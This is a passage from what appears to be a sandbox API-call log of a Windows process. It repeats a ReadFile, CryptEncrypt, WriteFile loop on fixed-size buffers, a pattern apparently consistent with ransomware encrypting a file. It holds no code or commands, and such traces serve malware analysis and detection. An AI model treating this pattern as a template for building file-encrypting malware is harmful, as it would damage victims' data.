[0283.071] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.071] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.071] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.071] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.071] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.071] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.071] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.071] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.071] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.071] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.071] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.072] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.072] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.072] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.072] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.072] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.072] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.072] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.072] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.072] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.072] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.072] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.073] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.073] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.073] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.073] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.073] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.073] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.073] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.073] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.073] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.073] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.073] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.074] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.074] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.074] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.074] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.074] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.074] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.074] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.074] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.074] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.074] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.074] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.074] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.075] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.075] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.075] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.075] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.075] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.075] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.075] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.075] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.075] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.075] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.075] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.075] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.076] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.076] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.076] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.076] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.076] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.076] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.076] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.076] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.076] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.076] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.076] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.076] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.076] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.076] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.077] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.077] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.077] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.077] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.077] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.077] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.077] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.077] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.077] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.077] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.077] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.077] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.078] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.078] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.078] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.078] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.078] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.078] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.079] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.079] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.079] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.079] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.079] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.079] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.079] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.079] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.079] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.079] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.079] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, 